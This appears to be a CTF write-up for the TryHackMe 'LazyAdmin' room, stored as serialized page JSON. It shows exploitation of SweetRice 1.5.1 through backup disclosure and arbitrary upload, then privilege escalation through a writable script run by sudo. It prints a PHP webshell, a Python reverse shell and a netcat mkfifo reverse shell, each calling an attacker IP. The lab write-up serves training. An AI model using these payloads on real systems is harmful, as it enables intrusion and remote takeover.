[{"data":1,"prerenderedAt":764},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-lazyadmin-writeup":3,"surround-\u002F2025\u002Ftryhackme-lazyadmin-writeup":755},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":748,"_id":749,"_source":750,"_file":751,"_stem":752,"_extension":753,"_original_dir":754},"\u002F2025\u002Ftryhackme-lazyadmin-writeup","2025",false,"","TryHackMe - LazyAdmin","This article is a step-by-step walkthrough for the 'LazyAdmin' room on TryHackMe. It covers finding a vulnerable CMS to get initial access and then exploiting a misconfigured script for root privileges.","2025-08-20T08:34:58.000Z","https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F1.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"2 min read",1.995,119700,399,{"type":20,"children":21,"toc":743},"root",[22,28,44,59,66,88,92,96,101,105,110,114,118,123,127,147,151,155,159,181,185,191,229,292,305,309,322,531,535,540,575,580,584,608,613,619,640,644,673,677,697,729,733,737],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Flazyadmin",[40],"nofollow",[42],{"type":33,"value":43},"10.10.137.124",{"type":23,"tag":29,"props":45,"children":46},{},[47,49],{"type":33,"value":48},"Attacker IP: ",{"type":23,"tag":50,"props":51,"children":56},"span",{"className":52,"id":54,"style":55},[53],"example-info","just-like-this","color: #EA5B6F",[57],{"type":33,"value":58},"10.8.13.246",{"type":23,"tag":60,"props":61,"children":63},"h2",{"id":62},"reconnaissance",[64],{"type":33,"value":65},"Reconnaissance",{"type":23,"tag":29,"props":67,"children":68},{},[69,71,78,80,86],{"type":33,"value":70},"Let us begin by running a port scan on the target. To be fast, we will first use ",{"type":23,"tag":72,"props":73,"children":75},"code",{"className":74},[],[76],{"type":33,"value":77},"rustscan",{"type":33,"value":79},", then use ",{"type":23,"tag":72,"props":81,"children":83},{"className":82},[],[84],{"type":33,"value":85},"nmap",{"type":33,"value":87}," for an in-depth scan on the discovered ports.",{"type":23,"tag":24,"props":89,"children":91},{"src":90},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F3.jpg",[],{"type":23,"tag":24,"props":93,"children":95},{"src":94},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":97,"children":98},{},[99],{"type":33,"value":100},"There is a web server, let's examine it.",{"type":23,"tag":24,"props":102,"children":104},{"src":103},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":106,"children":107},{},[108],{"type":33,"value":109},"Let's do a directory scan and see if we can find anything.",{"type":23,"tag":24,"props":111,"children":113},{"src":112},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F6.jpg",[],{"type":23,"tag":24,"props":115,"children":117},{"src":116},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":119,"children":120},{},[121],{"type":33,"value":122},"Now let's check for vulnerabilities in this web application.",{"type":23,"tag":24,"props":124,"children":126},{"src":125},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F8.jpg",[],{"type":23,"tag":29,"props":128,"children":129},{},[130,132,138,140,145],{"type":33,"value":131},"We need to find out which version of our target is being used. But we only found the ",{"type":23,"tag":72,"props":133,"children":135},{"className":134},[],[136],{"type":33,"value":137},"\u002Fcontent",{"type":33,"value":139}," directory, nothing else. Now let's scan the ",{"type":23,"tag":72,"props":141,"children":143},{"className":142},[],[144],{"type":33,"value":137},{"type":33,"value":146}," directory to see if there are any subdirectories.",{"type":23,"tag":24,"props":148,"children":150},{"src":149},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F9.jpg",[],{"type":23,"tag":24,"props":152,"children":154},{"src":153},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F10.jpg",[],{"type":23,"tag":24,"props":156,"children":158},{"src":157},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F11.jpg",[],{"type":23,"tag":29,"props":160,"children":161},{},[162,164,170,172,179],{"type":33,"value":163},"Here we encounter a file named ",{"type":23,"tag":72,"props":165,"children":167},{"className":166},[],[168],{"type":33,"value":169},"lastest.txt",{"type":33,"value":171},". From this file, we understand that we are using SweetRice version ",{"type":23,"tag":72,"props":173,"children":176},{"className":174,"id":54,"style":175},[53],"color: #4DFFBE",[177],{"type":33,"value":178},"1.5.1",{"type":33,"value":180},".",{"type":23,"tag":24,"props":182,"children":184},{"src":183},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F12.jpg",[],{"type":23,"tag":60,"props":186,"children":188},{"id":187},"initial-access",[189],{"type":33,"value":190},"Initial Access",{"type":23,"tag":29,"props":192,"children":193},{},[194,196,202,204,211,213,219,221,227],{"type":33,"value":195},"Now, when we search for ",{"type":23,"tag":72,"props":197,"children":199},{"className":198,"id":54,"style":55},[53],[200],{"type":33,"value":201},"SweetRice 1.5.1",{"type":33,"value":203}," again on ",{"type":23,"tag":36,"props":205,"children":208},{"href":206,"rel":207},"https:\u002F\u002Fexploit-db.com",[40],[209],{"type":33,"value":210},"expoit-db.com",{"type":33,"value":212},", we find the following exploits. I believe these two exploits will be useful for our purpose. We will use ",{"type":23,"tag":72,"props":214,"children":216},{"className":215,"id":54,"style":175},[53],[217],{"type":33,"value":218},"Backup Disclosure",{"type":33,"value":220}," to find exposed databases and then use the information obtained from there to upload any file we want using ",{"type":23,"tag":72,"props":222,"children":224},{"className":223,"id":54,"style":175},[53],[225],{"type":33,"value":226},"Arbitrary File Upload",{"type":33,"value":228}," (in our case, we will use a WebShell).",{"type":23,"tag":230,"props":231,"children":232},"ol",{},[233,241,248,255,262,278,285],{"type":23,"tag":234,"props":235,"children":236},"li",{},[237],{"type":23,"tag":24,"props":238,"children":240},{"src":239},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F13.jpg",[],{"type":23,"tag":234,"props":242,"children":243},{},[244],{"type":23,"tag":24,"props":245,"children":247},{"src":246},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F14.jpg",[],{"type":23,"tag":234,"props":249,"children":250},{},[251],{"type":23,"tag":24,"props":252,"children":254},{"src":253},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F15.jpg",[],{"type":23,"tag":234,"props":256,"children":257},{},[258],{"type":23,"tag":24,"props":259,"children":261},{"src":260},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F16.jpg",[],{"type":23,"tag":234,"props":263,"children":264},{},[265,267,273,274],{"type":33,"value":266},"We cracked the hash at ",{"type":23,"tag":36,"props":268,"children":271},{"href":269,"rel":270},"https:\u002F\u002Fcrackstation.net\u002F",[40],[272],{"type":33,"value":269},{"type":33,"value":180},{"type":23,"tag":24,"props":275,"children":277},{"src":276},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F17.jpg",[],{"type":23,"tag":234,"props":279,"children":280},{},[281],{"type":23,"tag":24,"props":282,"children":284},{"src":283},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F18.jpg",[],{"type":23,"tag":234,"props":286,"children":287},{},[288],{"type":23,"tag":24,"props":289,"children":291},{"src":290},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F19.jpg",[],{"type":23,"tag":29,"props":293,"children":294},{},[295,297,303],{"type":33,"value":296},"We tested the information we found at ",{"type":23,"tag":72,"props":298,"children":300},{"className":299},[],[301],{"type":33,"value":302},"\u002Fcontent\u002Fas",{"type":33,"value":304}," and it worked. Now let's add a webshell using this information. For this, we will use the following exploit.",{"type":23,"tag":24,"props":306,"children":308},{"src":307},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F20.jpg",[],{"type":23,"tag":29,"props":310,"children":311},{},[312,314,320],{"type":33,"value":313},"Now let's run the exploit with the command ",{"type":23,"tag":72,"props":315,"children":317},{"className":316},[],[318],{"type":33,"value":319},"python 40716.py",{"type":33,"value":321}," and create the webshell we will upload before filling in the necessary parts.",{"type":23,"tag":323,"props":324,"children":329},"pre",{"className":325,"code":326,"filename":327,"language":328,"meta":7,"style":7},"language-php shiki shiki-themes catppuccin-latte one-dark-pro","\u003C?php\n\u002F\u002F A simple command execution webshell\nif(isset($_REQUEST['cmd'])){\n    echo \"\u003Cpre>\";\n    $cmd = ($_REQUEST['cmd']);\n    system($cmd);\n    echo \"\u003C\u002Fpre>\";\n}\n?>\n","shell.phtml","php",[330],{"type":23,"tag":72,"props":331,"children":332},{"__ignoreMap":7},[333,356,366,414,433,469,492,509,518],{"type":23,"tag":50,"props":334,"children":337},{"class":335,"line":336},"line",1,[338,344,350],{"type":23,"tag":50,"props":339,"children":341},{"style":340},"--shiki-default:#179299;--shiki-dark:#56B6C2",[342],{"type":33,"value":343},"\u003C",{"type":23,"tag":50,"props":345,"children":347},{"style":346},"--shiki-default:#179299;--shiki-dark:#C678DD",[348],{"type":33,"value":349},"?",{"type":23,"tag":50,"props":351,"children":353},{"style":352},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[354],{"type":33,"value":355},"php\n",{"type":23,"tag":50,"props":357,"children":359},{"class":335,"line":358},2,[360],{"type":23,"tag":50,"props":361,"children":363},{"style":362},"--shiki-default:#9CA0B0;--shiki-default-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic",[364],{"type":33,"value":365},"\u002F\u002F A simple command execution webshell\n",{"type":23,"tag":50,"props":367,"children":369},{"class":335,"line":368},3,[370,376,382,388,392,398,403,409],{"type":23,"tag":50,"props":371,"children":373},{"style":372},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[374],{"type":33,"value":375},"if",{"type":23,"tag":50,"props":377,"children":379},{"style":378},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[380],{"type":33,"value":381},"(",{"type":23,"tag":50,"props":383,"children":385},{"style":384},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[386],{"type":33,"value":387},"isset",{"type":23,"tag":50,"props":389,"children":390},{"style":378},[391],{"type":33,"value":381},{"type":23,"tag":50,"props":393,"children":395},{"style":394},"--shiki-default:#4C4F69;--shiki-dark:#E06C75",[396],{"type":33,"value":397},"$_REQUEST",{"type":23,"tag":50,"props":399,"children":400},{"style":378},[401],{"type":33,"value":402},"[",{"type":23,"tag":50,"props":404,"children":406},{"style":405},"--shiki-default:#40A02B;--shiki-dark:#98C379",[407],{"type":33,"value":408},"'cmd'",{"type":23,"tag":50,"props":410,"children":411},{"style":378},[412],{"type":33,"value":413},"])){\n",{"type":23,"tag":50,"props":415,"children":417},{"class":335,"line":416},4,[418,423,428],{"type":23,"tag":50,"props":419,"children":420},{"style":384},[421],{"type":33,"value":422},"    echo",{"type":23,"tag":50,"props":424,"children":425},{"style":405},[426],{"type":33,"value":427}," \"\u003Cpre>\"",{"type":23,"tag":50,"props":429,"children":430},{"style":378},[431],{"type":33,"value":432},";\n",{"type":23,"tag":50,"props":434,"children":436},{"class":335,"line":435},5,[437,442,447,452,456,460,464],{"type":23,"tag":50,"props":438,"children":439},{"style":394},[440],{"type":33,"value":441},"    $cmd",{"type":23,"tag":50,"props":443,"children":444},{"style":340},[445],{"type":33,"value":446}," =",{"type":23,"tag":50,"props":448,"children":449},{"style":378},[450],{"type":33,"value":451}," (",{"type":23,"tag":50,"props":453,"children":454},{"style":394},[455],{"type":33,"value":397},{"type":23,"tag":50,"props":457,"children":458},{"style":378},[459],{"type":33,"value":402},{"type":23,"tag":50,"props":461,"children":462},{"style":405},[463],{"type":33,"value":408},{"type":23,"tag":50,"props":465,"children":466},{"style":378},[467],{"type":33,"value":468},"]);\n",{"type":23,"tag":50,"props":470,"children":472},{"class":335,"line":471},6,[473,478,482,487],{"type":23,"tag":50,"props":474,"children":475},{"style":384},[476],{"type":33,"value":477},"    system",{"type":23,"tag":50,"props":479,"children":480},{"style":378},[481],{"type":33,"value":381},{"type":23,"tag":50,"props":483,"children":484},{"style":394},[485],{"type":33,"value":486},"$cmd",{"type":23,"tag":50,"props":488,"children":489},{"style":378},[490],{"type":33,"value":491},");\n",{"type":23,"tag":50,"props":493,"children":495},{"class":335,"line":494},7,[496,500,505],{"type":23,"tag":50,"props":497,"children":498},{"style":384},[499],{"type":33,"value":422},{"type":23,"tag":50,"props":501,"children":502},{"style":405},[503],{"type":33,"value":504}," \"\u003C\u002Fpre>\"",{"type":23,"tag":50,"props":506,"children":507},{"style":378},[508],{"type":33,"value":432},{"type":23,"tag":50,"props":510,"children":512},{"class":335,"line":511},8,[513],{"type":23,"tag":50,"props":514,"children":515},{"style":378},[516],{"type":33,"value":517},"}\n",{"type":23,"tag":50,"props":519,"children":521},{"class":335,"line":520},9,[522,526],{"type":23,"tag":50,"props":523,"children":524},{"style":346},[525],{"type":33,"value":349},{"type":23,"tag":50,"props":527,"children":528},{"style":340},[529],{"type":33,"value":530},">\n",{"type":23,"tag":24,"props":532,"children":534},{"src":533},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F21.jpg",[],{"type":23,"tag":29,"props":536,"children":537},{},[538],{"type":33,"value":539},"Yes, we can now run code remotely. Let's open a reverse shell from here. I will use Python for this. Use the following command and add your information.",{"type":23,"tag":323,"props":541,"children":546},{"className":542,"code":543,"filename":544,"language":545,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","http:\u002F\u002F10.10.137.124\u002Fcontent\u002Fattachment\u002Fshell.phtml?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.13.246\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\u002Fbin\u002Fsh\",\"-i\"]);'\n","full url","bash",[547],{"type":23,"tag":72,"props":548,"children":549},{"__ignoreMap":7},[550],{"type":23,"tag":50,"props":551,"children":552},{"class":335,"line":336},[553,559,564,570],{"type":23,"tag":50,"props":554,"children":556},{"style":555},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[557],{"type":33,"value":558},"http:\u002F\u002F10.10.137.124\u002Fcontent\u002Fattachment\u002Fshell.phtml?cmd",{"type":23,"tag":50,"props":560,"children":561},{"style":405},[562],{"type":33,"value":563},"=python",{"type":23,"tag":50,"props":565,"children":567},{"style":566},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[568],{"type":33,"value":569}," -c",{"type":23,"tag":50,"props":571,"children":572},{"style":405},[573],{"type":33,"value":574}," 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.13.246\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\u002Fbin\u002Fsh\",\"-i\"]);'\n",{"type":23,"tag":29,"props":576,"children":577},{},[578],{"type":33,"value":579},"When we run this URL, we get a shell from the port we are listening to, as shown below.",{"type":23,"tag":24,"props":581,"children":583},{"src":582},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F22.jpg",[],{"type":23,"tag":323,"props":585,"children":587},{"className":542,"code":586,"language":545,"meta":7,"style":7},"python -c 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n",[588],{"type":23,"tag":72,"props":589,"children":590},{"__ignoreMap":7},[591],{"type":23,"tag":50,"props":592,"children":593},{"class":335,"line":336},[594,599,603],{"type":23,"tag":50,"props":595,"children":596},{"style":555},[597],{"type":33,"value":598},"python",{"type":23,"tag":50,"props":600,"children":601},{"style":566},[602],{"type":33,"value":569},{"type":23,"tag":50,"props":604,"children":605},{"style":405},[606],{"type":33,"value":607}," 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n",{"type":23,"tag":29,"props":609,"children":610},{},[611],{"type":33,"value":612},"You can switch to a more interactive shell by running this command.",{"type":23,"tag":60,"props":614,"children":616},{"id":615},"privilege-escalation",[617],{"type":33,"value":618},"Privilege Escalation",{"type":23,"tag":29,"props":620,"children":621},{},[622,624,630,632,638],{"type":33,"value":623},"When we run our checks, we see that the command ",{"type":23,"tag":72,"props":625,"children":627},{"className":626},[],[628],{"type":33,"value":629},"\u002Fusr\u002Fbin\u002Fperl \u002Fhome\u002Fitguy\u002Fbackup.pl",{"type":33,"value":631}," can be executed by ",{"type":23,"tag":72,"props":633,"children":635},{"className":634},[],[636],{"type":33,"value":637},"www-data",{"type":33,"value":639}," without a password and with root privileges.",{"type":23,"tag":24,"props":641,"children":643},{"src":642},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F23.jpg",[],{"type":23,"tag":29,"props":645,"children":646},{},[647,649,655,657,663,665,671],{"type":33,"value":648},"When we check this ",{"type":23,"tag":72,"props":650,"children":652},{"className":651},[],[653],{"type":33,"value":654},".pl",{"type":33,"value":656}," file, it contains a code to run ",{"type":23,"tag":72,"props":658,"children":660},{"className":659},[],[661],{"type":33,"value":662},"\u002Fetc\u002Fcopy.sh",{"type":33,"value":664},". We immediately think that if we modify this ",{"type":23,"tag":72,"props":666,"children":668},{"className":667},[],[669],{"type":33,"value":670},"copy.sh",{"type":33,"value":672}," file to open a shell for us, we can increase our authorization. (We have permission to modify this file.)",{"type":23,"tag":24,"props":674,"children":676},{"src":675},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F24.jpg",[],{"type":23,"tag":29,"props":678,"children":679},{},[680,682,687,689,695],{"type":33,"value":681},"Since this is a CTF, we already have a reverse shell in ",{"type":23,"tag":72,"props":683,"children":685},{"className":684},[],[686],{"type":33,"value":670},{"type":33,"value":688},". We just need to replace the information with our own. Then, if we run the command ",{"type":23,"tag":72,"props":690,"children":692},{"className":691,"id":54,"style":175},[53],[693],{"type":33,"value":694},"sudo \u002Fusr\u002Fbin\u002Fperl \u002Fhome\u002Fitguy\u002Fbackup.pl",{"type":33,"value":696},", we will obtain root privileges.",{"type":23,"tag":323,"props":698,"children":700},{"className":542,"code":699,"language":545,"meta":7,"style":7},"echo \"rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.8.13.246 12344 >\u002Ftmp\u002Ff\" > \u002Fetc\u002Fcopy.sh\n",[701],{"type":23,"tag":72,"props":702,"children":703},{"__ignoreMap":7},[704],{"type":23,"tag":50,"props":705,"children":706},{"class":335,"line":336},[707,713,718,724],{"type":23,"tag":50,"props":708,"children":710},{"style":709},"--shiki-default:#D20F39;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[711],{"type":33,"value":712},"echo",{"type":23,"tag":50,"props":714,"children":715},{"style":405},[716],{"type":33,"value":717}," \"rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.8.13.246 12344 >\u002Ftmp\u002Ff\"",{"type":23,"tag":50,"props":719,"children":721},{"style":720},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[722],{"type":33,"value":723}," >",{"type":23,"tag":50,"props":725,"children":726},{"style":405},[727],{"type":33,"value":728}," \u002Fetc\u002Fcopy.sh\n",{"type":23,"tag":24,"props":730,"children":732},{"src":731},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F25.jpg",[],{"type":23,"tag":24,"props":734,"children":736},{"src":735},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-lazyadmin-writeup\u002F26.jpg",[],{"type":23,"tag":738,"props":739,"children":740},"style",{},[741],{"type":33,"value":742},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":416,"depth":416,"links":744},[745,746,747],{"id":62,"depth":358,"text":65},{"id":187,"depth":358,"text":190},{"id":615,"depth":358,"text":618},"markdown","content:posts:2025:tryhackme-lazyadmin-writeup.md","content","posts\u002F2025\u002Ftryhackme-lazyadmin-writeup.md","posts\u002F2025\u002Ftryhackme-lazyadmin-writeup","md","\u002Fposts",[756,760],{"_path":757,"title":758,"date":759},"\u002F2025\u002Ftryhackme-agentsudo-writeup","TryHackMe - Agent Sudo","2025-08-19T11:07:27.000Z",{"_path":761,"title":762,"date":763},"\u002F2025\u002Ftryhackme-overpass-writeup","TryHackMe - Overpass","2025-08-21T12:23:20.000Z",1777022959242]